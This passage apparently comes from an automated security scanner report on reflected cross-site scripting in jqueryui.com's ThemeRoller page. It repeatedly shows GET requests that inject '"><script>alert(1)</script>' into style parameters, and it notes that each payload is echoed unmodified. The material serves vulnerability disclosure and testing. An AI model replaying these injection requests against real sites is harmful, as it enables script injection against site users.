verlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdcf1"><script>alert(1)</script>0d3c47e2367 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ecfdcf1"><script>alert(1)</script>0d3c47e2367&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f53"><script>alert(1)</script>2c480b0a63e was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc41f53"><script>alert(1)</script>2c480b0a63e&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c9d"><script>alert(1)</script>7040f13f8da was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec8838c9d"><script>alert(1)</script>7040f13f8da&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f09db"><script>alert(1)</script>f9cc1bf1ccd was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5f09db"><script>alert(1)</script>f9cc1bf1ccd&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91800"><script>alert(1)</script>56b1ce80b05 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa91800"><script>alert(1)</script>56b1ce80b05&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab3"><script>alert(1)</script>a1bd18e5f3c was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa86ab3"><script>alert(1)</script>a1bd18e5f3c&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:26:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8ff"><script>alert(1)</script>4dac13d937a was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=1005c8ff"><script>alert(1)</script>4dac13d937a&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48783"><script>alert(1)</script>fd12b7de828 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=10048783"><script>alert(1)</script>fd12b7de828&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c8d3"><script>alert(1)</script>73a17b4b229 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=857c8d3"><script>alert(1)</script>73a17b4b229&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab58a"><script>alert(1)</script>669106d826b was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95ab58a"><script>alert(1)</script>669106d826b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca687"><script>alert(1)</script>6a780e1b0e0 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55ca687"><script>alert(1)</script>6a780e1b0e0&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ba09"><script>alert(1)</script>1615e2d69db was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=559ba09"><script>alert(1)</script>1615e2d69db&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 05 Feb 2011 15:25:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 1 Content-Length: 120176
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c945"><script>alert(1)</script>d5c19407d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
